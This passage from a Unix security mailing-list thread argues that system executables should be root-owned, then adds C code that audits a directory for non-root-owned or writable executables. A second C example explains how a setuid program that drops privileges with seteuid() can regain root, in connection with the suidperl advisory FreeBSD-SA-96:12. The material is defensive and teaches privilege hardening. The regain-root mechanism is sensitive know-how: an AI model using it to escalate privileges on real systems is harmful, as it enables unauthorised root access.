> system are owned by bin, a hosts.equiv might as well allow root access.

Not on the systems that we have here that need to be secure, they're not.
All system executables and directories are owned by root.  And /tmp and
/var/tmp are owned by user tmp and group tmp.  Paranoia is healthy.
Internal systems are set up loose, external systems are screwed down
tight.

Blatant tautology alert: Just because a system is shipped insecure
doesn't mean it has to be left that way.

-- 
Mike Murphy  mrm@Mole.ORG  +1 619 598 5874
Better is the enemy of Good
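Nathan Lawson's and Mike Murphy's messages above make the same point from two sides: a program that root will execute (telnetd started by inetd, anything under /bin or /usr/bin) is only as trustworthy as every account that can write to it, so an executable owned by bin, or writable by a group or by everyone, is a path from that account to root. The following is an added example, not code posted by either of them, of the audit a practitioner would run to find such files. It walks one directory with lstat(), flags executables that are not owned by UID 0 or that are group- or world-writable, and, so that it runs stand-alone, builds a constructed scratch tree under /tmp (the directory name template, the file names and their modes are assumptions, not anything from a real system). Run with a directory argument (for example /usr/libexec) it audits that directory instead.

```c
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif
#define EXEC_BITS (S_IXUSR | S_IXGRP | S_IXOTH)

/* Findings for one executable, as a bitmask. */
enum {
    NOT_ROOT_OWNED = 1,  /* the owner (bin, say) can replace it without root */
    GROUP_WRITABLE = 2,  /* any member of the owning group can replace it */
    WORLD_WRITABLE = 4   /* anyone can replace it */
};

/* Findings for path; 0 if clean or not an executable regular file; -1 if it
 * cannot be stat'ed.  lstat() is used so a symlink is not mistaken for the
 * file it points at (links are simply skipped). */
int audit_file(const char *path)
{
    struct stat st;
    int findings = 0;

    if (lstat(path, &st) != 0)
        return -1;
    if (!S_ISREG(st.st_mode) || (st.st_mode & EXEC_BITS) == 0)
        return 0;
    if (st.st_uid != 0)
        findings |= NOT_ROOT_OWNED;
    if (st.st_mode & S_IWGRP)
        findings |= GROUP_WRITABLE;
    if (st.st_mode & S_IWOTH)
        findings |= WORLD_WRITABLE;
    return findings;
}

/* Audits every entry directly under dir, writing flagged files to report
 * (if non-NULL).  Returns the number of flagged files, -1 on error. */
int audit_dir(const char *dir, FILE *report)
{
    DIR *d = opendir(dir);
    struct dirent *e;
    char path[PATH_MAX];
    int flagged = 0;

    if (d == NULL)
        return -1;
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        int f = audit_file(path);
        if (f <= 0)
            continue;
        flagged++;
        if (report != NULL)
            fprintf(report, "%s:%s%s%s\n", path,
                    (f & NOT_ROOT_OWNED) ? " not-root-owned" : "",
                    (f & GROUP_WRITABLE) ? " group-writable" : "",
                    (f & WORLD_WRITABLE) ? " world-writable" : "");
    }
    closedir(d);
    return flagged;
}

/* Creates path with an explicit mode via fchmod() so the umask cannot
 * interfere.  Only used to build the constructed sample tree. */
int make_file(const char *path, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    int rc = fchmod(fd, mode);
    close(fd);
    return rc;
}

/* Constructed sample tree (assumed names, not a real system): a
 * world-writable "daemon", a group-writable "tool", a correctly protected
 * "safe" and a non-executable "data" file.  Stores the directory in dir. */
int build_sample_tree(char *dir, size_t n)
{
    char tmpl[] = "/tmp/binaudit.XXXXXX";
    char path[PATH_MAX];
    static const struct { const char *name; mode_t mode; } files[] = {
        { "daemon", 0777 }, { "tool", 0775 }, { "safe", 0755 }, { "data", 0644 }
    };

    if (mkdtemp(tmpl) == NULL || strlen(tmpl) + 1 > n)
        return -1;
    strcpy(dir, tmpl);
    for (size_t i = 0; i < sizeof files / sizeof files[0]; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, files[i].name);
        if (make_file(path, files[i].mode) != 0)
            return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    char dir[64];

    if (argc > 1)                       /* audit a real directory */
        return audit_dir(argv[1], stdout) != 0;
    if (build_sample_tree(dir, sizeof dir) != 0) {
        perror("build_sample_tree");
        return 1;
    }
    int n = audit_dir(dir, stdout);     /* daemon and tool are always flagged */
    printf("%d flagged under %s\n", n, dir);
    return n != 0;
}
```

Run as an ordinary user every file in the scratch tree is also reported as not-root-owned, which is exactly the condition Nathan Lawson describes for a bin-owned /usr/bin; run as root only the writability findings remain. The audit is deliberately one level deep and ignores symlinks; extending it to recurse with nftw() is straightforward, and a real sweep should also cover the directories themselves, since write access to /usr/libexec is as good as write access to telnetd.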
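The FreeBSD-SA-96:12 advisory earlier on this page says only that suidperl's privilege handling "does not take into account recent functionality extensions in the seteuid/setegid system calls" on _POSIX_SAVED_IDS systems. The following is an added illustration of what that extension changes, written for this page; it is not suidperl's code and does not reproduce the advisory's exploit. A setuid-root program that lowers itself with seteuid()/setegid() changes only its effective IDs, so the saved set-user-ID stays 0 and the process, or a script interpreted inside it, can call seteuid(0) and be root again; setuid()/setgid() called with effective UID 0 change real, effective and saved IDs together (on both FreeBSD and Linux), after which seteuid(0) fails with EPERM. The target UID/GID of 65534 ("nobody" on many systems) is an assumption. The difference is only visible when the program is started as root; as an unprivileged user both drops succeed trivially and neither can regain root.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Lower only the effective IDs.  On a _POSIX_SAVED_IDS system the saved
 * set-user-ID keeps its old value (0 for a setuid-root program), so this
 * process, and anything it interprets in-process, may later call
 * seteuid(0) and become root again. */
int drop_temporarily(uid_t uid, gid_t gid)
{
    if (setegid(gid) != 0)
        return -1;
    if (seteuid(uid) != 0)
        return -1;
    return 0;
}

/* Lower real, effective and saved IDs together.  Group first: once the
 * UID is non-root, setgid() to another group would itself be refused. */
int drop_permanently(uid_t uid, gid_t gid)
{
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    /* Verify the drop instead of trusting it: if root can be regained,
     * report failure rather than carry on believing we are unprivileged. */
    if (uid != 0 && seteuid(0) == 0)
        return -2;
    return 0;
}

/* 1 if the process is root or can make itself root via seteuid(0),
 * 0 otherwise.  A successful probe leaves the process running as root. */
int can_regain_root(void)
{
    if (geteuid() == 0)
        return 1;
    return seteuid(0) == 0;
}

int main(void)
{
    /* Assumed unprivileged target: UID/GID 65534 ("nobody" on many systems). */
    uid_t target_uid = 65534;
    gid_t target_gid = 65534;

    if (geteuid() != 0) {
        printf("not root (euid %d): both drops succeed trivially, "
               "can_regain_root() = %d\n", (int)geteuid(), can_regain_root());
        return 0;
    }
    if (drop_temporarily(target_uid, target_gid) != 0) {
        perror("drop_temporarily");
        return 1;
    }
    /* Expected 1 on a saved-IDs system; the probe has just taken root back. */
    printf("after seteuid() drop: can_regain_root() = %d\n", can_regain_root());

    if (drop_permanently(target_uid, target_gid) != 0) {
        perror("drop_permanently");
        return 1;
    }
    /* Expected 0: the saved set-user-ID is now 65534 as well. */
    printf("after setuid() drop:  can_regain_root() = %d\n", can_regain_root());
    return 0;
}
```

The second function is the shape the advisory's fix and Larry Wall's fix both aim for, by different routes: privilege must be given up on all three IDs before untrusted code runs, and the program should check that it cannot get root back rather than assume so. That check is what makes the workaround of chmod 111 on suidperl sufficient: with no setuid bit there is no saved UID 0 to return to.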